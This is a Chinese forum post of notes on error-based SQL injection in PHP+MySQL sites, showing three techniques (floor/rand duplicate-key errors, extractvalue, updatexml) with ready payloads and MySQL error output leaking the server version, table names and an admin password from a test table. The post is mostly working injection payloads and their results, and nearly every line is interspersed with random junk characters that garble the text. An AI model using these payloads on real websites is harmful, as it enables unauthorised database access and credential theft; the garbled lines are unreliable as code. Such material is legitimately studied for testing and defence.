放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。$ u1 D- w+ F! c" k% k1 U- v6 f& ?# {
实际测试环境:3 R% W$ ~" ^6 w
0 V9 r# _6 v# ]! ^6 g$ W
$ J, A- L0 Z! J) lmysql> show tables;( W& @& o' W. q' u3 V
+----------------+
' T5 l c# f% B( f0 A* R| Tables_in_test |; H; G d* n0 L
+----------------+1 S. K; d: B1 s: w5 z, z8 [% L1 ?+ [
| admin |6 J( W( `% v2 |! | M1 C
| article |. b& d# p3 g' j
+----------------+& P2 U I. R0 C
w+ u# W5 B% O7 z. J' f8 m. L2 t' `
' d4 w. d* u8 p ' X1 m. F6 Y% ?0 e5 }9 E
mysql> describe admin;
! X8 D# o2 w$ @5 H( k6 t! E& l+-------+------------------+------+-----+---------+----------------+5 }3 N" L; r" D, I! S2 X; A
| Field | Type | Null | Key | Default | Extra |
/ F$ s7 n! m2 h) ?2 X+-------+------------------+------+-----+---------+----------------+
d3 |6 H: y# ^| id | int(10) unsigned | NO | PRI | NULL | auto_increment |' B7 s, o2 u- g$ d) U/ J
| user | varchar(50) | NO | | NULL | |
+ z: T* J) p9 q7 D+ @8 Y9 i+ i| pass | varchar(50) | NO | | NULL | |5 j& w( g8 A. |5 }
+-------+------------------+------+-----+---------+----------------+
3 u! N/ g& r1 V) w 2 Q# R9 W+ V4 q# g2 N
4 k0 i: n) O2 o1 L- j8 x/ Z7 K
5 r& \, {8 J. X0 N9 B; M
mysql> describe article;
5 w) ?9 p3 j @" T0 S( F0 h+---------+------------------+------+-----+---------+----------------+, x0 K* F7 d0 f% E L$ ^
| Field | Type | Null | Key | Default | Extra |: R9 z7 {' F1 G: J5 z
+---------+------------------+------+-----+---------+----------------+
* c$ e; k' k1 \4 ^/ ?) O* @+ x, {0 `| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
+ }0 e. t/ }- f& d$ ]| title | varchar(50) | NO | | NULL | |
; ^, E0 P4 K: E T, B: ?| content | varchar(50) | NO | | NULL | |
4 ]5 W* X! T; i5 z* R3 G+---------+------------------+------+-----+---------+----------------+
4 Z. g( I% D* U3 B: M& X1、通过floor报错
8 O9 a& T: ]& h' n' ^3 A可以通过如下一些利用代码" O& c/ |7 r9 O4 p7 w
9 o1 v) Q' g' m' x) M
' y) Z+ w6 a; K* ^and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
* s% b2 M! B. H9 o9 O& [3 f, w. \from information_schema.tables group by x)a);
. H6 y& G7 L. A6 W& Z3 R . k4 R" j% U5 v$ u
2 p2 m, j* `8 v a land (select count(*) from (select 1 union select null union select !1)x
1 c$ d. g6 v/ Mgroup by concat((select table_name from information_schema.tables limit 1),/ j6 V( Y6 N# o
floor(rand(0)*2)));/ a% A" |# {8 {4 @" @
举例如下: ]8 v* w% b. G. e& Y! ~, m: n" H E
首先进行正常查询:$ R8 j% b8 ?1 U9 Q& |) {
! H% a5 ?5 H/ T8 ?mysql> select * from article where id = 1;
' o* l) R' w7 i: L- ?+----+-------+---------+
. _3 f& e6 z7 r| id | title | content |3 Y: S( ]$ @# |4 \: I/ _
+----+-------+---------+
% ?" ~. R) {9 Z" {& Y| 1 | test | do it |
* g6 H8 A3 b$ D R K+----+-------+---------+
- @# [& D8 j2 c) Q假如id输入存在注入的话,可以通过如下语句进行报错。0 \9 D3 C6 o, ~2 B# D
) Y+ E8 P& s2 d
B# T* K, E3 u7 u3 V2 [' Q0 G7 ~( Umysql> select * from article where id = 1 and (select 1 from
/ z% H" _1 C( b( Q; P$ g(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);) v1 ~; J7 h M9 Z# ^! V
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'" }* _, y) t; f3 a v1 w2 S4 v
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 A8 B( T1 A8 T+ I' z* L
例如我们需要查询管理员用户名和密码:2 r; G/ N$ U" L- d, G$ Q6 A. u8 e: Z
Method1:
' e) u I! Z$ o- F9 y- Z z
m( t7 ]7 g: R. z, q: D9 `. C5 W$ {
$ _! [' _- ^2 U" J! C% Umysql> select * from article where id = 1 and (select 1 from
) Q$ Y) w2 |; l0 @. ?(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
% O5 D. o/ s0 \. m6 D' ?from information_schema.tables group by x)a);
- h5 j0 y1 B- u. j7 r9 }ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
0 o/ I* J2 n1 t; C& x0 lMethod2:2 W# Z, F3 O6 a H8 A
1 {7 a R7 [* e; c
+ T1 I$ T! i4 a" Vmysql> select * from article where id = 1 and (select count(*), j7 `4 Q. F- {
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
S1 A/ G9 r" C, ?. ffloor(rand(0)*2)));
# y# J- u7 _6 }- c- ]; CERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' A0 m) |) ]+ y E
2、ExtractValue
* ]1 r6 J9 Y5 e& M. U) h7 {! ?测试语句如下
7 ?3 F5 U0 {9 f* H x
! N% s2 Z. q, D6 U( V " Q/ o; r# m1 G* H. ]: p6 B
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
! O' ]" ?& [4 o: ~实际测试过程' F2 s5 U7 d: I8 y* k9 j# a
2 @1 W$ @2 U) r6 K
" A$ _6 b, A, y1 X, Y
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,' H5 s O" \- ]5 L+ R+ }! i
(select pass from admin limit 1)));--- I0 Y" J6 t% W: M" X0 @# D* c# W
ERROR 1105 (HY000): XPATH syntax error: '\admin888'3 Y' a( q0 y5 D; _# E
3、UpdateXml2 j! E/ J: W6 J" Z/ g% h
测试语句6 M( V# F: [; C5 j$ w/ Q
' c7 W) v3 d' T% k( j
/ H; k! V# o j' u7 R0 d7 land 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* E) C: q/ h9 b" d( [实际测试过程
, N! J9 c" X; C% v: N3 O
8 I; B0 n+ j. y; w& L; I1 ~
" j6 A1 t" G/ l9 S7 z; p/ Lmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,. s) B% ~+ J- P3 j# p7 D8 q I
(select pass from admin limit 1),0x5e24),1));
1 N" w( {+ [7 Z+ ^% D9 ^9 h' j% oERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'( i4 O' Z$ F: l7 k8 [4 U1 t8 n
All, thanks foreign guys.8 z6 ]# f( [& N* o, e
. V& ?/ x1 {' k g; [, X, x1 ^9 g0 X4 e% }( Y! o# L
|
发表于 2012-12-10 10:28:51
收藏
支持
反对